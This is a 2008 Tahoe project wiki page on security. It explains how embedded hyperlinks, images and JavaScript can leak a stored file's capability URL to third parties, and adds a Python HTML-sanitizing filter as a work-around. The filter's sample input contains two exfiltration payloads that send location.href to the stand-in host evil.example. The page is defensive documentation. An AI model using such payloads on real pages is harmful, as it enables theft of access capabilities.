wiki:Security

Version 14 (modified by zooko, at 2008-01-09T02:23:44Z)

remove two fixed security issues

Security Considerations

This page exists so that there is a single place to go to learn about the general security properties of Tahoe, as well as about any current known issues that might have security consequences.

Current Known Security Issues in Tahoe

as of January 8, 2008

  • potential exposure of a file through embedded hyperlinks or JavaScript in that file

If a file stored on a Tahoe storage grid is downloaded and displayed in a web browser, the browser fetches it through a URL that contains the capability to that file. JavaScript or hyperlinks within the file can then leak that capability to a third party, and whoever holds the capability has access to the file.

If there is JavaScript in the file, it can read the page's URL, including the capability, and deliberately send it out to some remote listener.

If there are hyperlinks in the file and they get followed, whichever server they point to receives the capability to the file, because the browser sends the URL of the current page in the HTTP Referer header. Note that IMG tags and similar embedded resources are typically fetched automatically by web browsers, so being careful about which hyperlinks you click on is not sufficient to prevent this from happening.

For future versions of Tahoe, we are considering ways to close off this leakage of authority while preserving ease of use -- the discussion of this issue is ticket #127.

For the present, the work-around is this: if you want to store a file on Tahoe, view it in a browser, and keep it private, then remove from that file any hyperlinks (including IMG tags and other embedded resources) that point to other people's servers, and remove any JavaScript unless you are sure that the JavaScript is not written to maliciously leak access.
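The leak described above and the work-around for it, as an added example that is not Tahoe code: a Python pre-upload filter that reports every construct in an HTML file which could carry the viewing URL (and so the capability) to another server, and writes out a copy of the file with those constructs removed. It assumes only what this page states: the browser fetches the file at a URL containing the capability, so requests to other servers can carry that URL in the Referer header and any script can read it from window.location. The tag and attribute tables, the sample document and the function names are this example's own.

```python
"""Pre-upload filter for the capability leak described on this page.

Added example, not part of Tahoe. Assumes the file is viewed at a URL that
embeds its capability, so cross-server requests can leak it via Referer and
in-page script can read it from window.location.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes the browser fetches automatically while rendering (no click needed).
AUTO_FETCH = {
    "img": ("src",), "script": ("src",), "iframe": ("src",), "link": ("href",),
    "embed": ("src",), "object": ("data",), "video": ("src", "poster"),
    "audio": ("src",), "source": ("src",),
}
# Attributes that leak only when the user follows them.
ON_CLICK = {"a": ("href",), "area": ("href",), "form": ("action",)}


def is_external(url):
    """True if the URL names another server (absolute URL or '//host/...').
    Relative URLs resolve back to the Tahoe node and leak nothing."""
    return bool(urlsplit(url.strip()).netloc)


def format_attrs(attrs):
    # HTMLParser hands us unescaped attribute values; re-escape them on output.
    return "".join(
        f' {name}="{html.escape(value, quote=True)}"' if value is not None else f" {name}"
        for name, value in attrs
    )


class CapLeakFilter(HTMLParser):
    """Records every construct that can leak the viewing URL and rebuilds the
    document without them: script elements are dropped whole, other tags are
    kept with only the offending attributes removed."""

    def __init__(self):
        super().__init__(convert_charrefs=False)  # keep entities verbatim
        self.findings = []   # (kind, detail); kind is "auto", "click" or "script"
        self.out = []
        self._in_script = False

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            lname = name.lower()
            val = (value or "").strip()
            if lname.startswith("on"):                    # event handler
                self.findings.append(("script", f"<{tag} {lname}>"))
            elif val.lower().startswith("javascript:"):   # javascript: URL
                self.findings.append(("script", f"<{tag} {lname}=javascript:>"))
            elif lname in AUTO_FETCH.get(tag, ()) and is_external(val):
                self.findings.append(("auto", f"<{tag} {lname}={val}>"))
            elif lname in ON_CLICK.get(tag, ()) and is_external(val):
                self.findings.append(("click", f"<{tag} {lname}={val}>"))
            else:
                kept.append((name, value))
        return kept

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script", "<script>"))
            self._in_script = True        # content is dropped until </script>
            return
        self.out.append(f"<{tag}{format_attrs(self._clean_attrs(tag, attrs))}>")

    def handle_startendtag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script", "<script/>"))
            return
        self.out.append(f"<{tag}{format_attrs(self._clean_attrs(tag, attrs))} />")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
        elif not self._in_script:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._in_script:
            self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def strip_cap_leaks(doc):
    """Return (sanitized_html, findings) for an HTML document string."""
    f = CapLeakFilter()
    f.feed(doc)
    f.close()
    return "".join(f.out), f.findings


# Constructed sample: a page that would leak its capability three ways.
SAMPLE = (
    '<html><body>\n'
    '<h1>Quarterly notes</h1>\n'
    '<img src="http://tracker.example/pixel.gif">\n'                 # fetched on render
    '<a href="https://partner.example/report">partner report</a>\n'  # leaks if clicked
    '<a href="notes.txt">sibling file on the same node</a>\n'        # relative: harmless
    '<script>new Image().src = "http://evil.example/?c=" + location.href;</script>\n'
    '<p onmouseover="fetch(\'//evil.example/\' + location.href)">hover me</p>\n'
    '</body></html>\n'
)

if __name__ == "__main__":
    clean, findings = strip_cap_leaks(SAMPLE)
    for kind, detail in findings:
        print(f"{kind:<6} {detail}")
    print(clean)
```

Running it on the sample reports one "auto" finding (the IMG, which leaks without any click), one "click" finding (the partner link), and two "script" findings (the inline script and the onmouseover handler); the relative link to notes.txt is left untouched, since it resolves to the same Tahoe node. A finding of kind "auto" is the one to treat as already leaked if the file was ever opened in a browser.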

General Security Properties of Tahoe

This will eventually be a summary of the general properties of the Tahoe secure decentralized filesystem.

For technical details, there is the architecture document.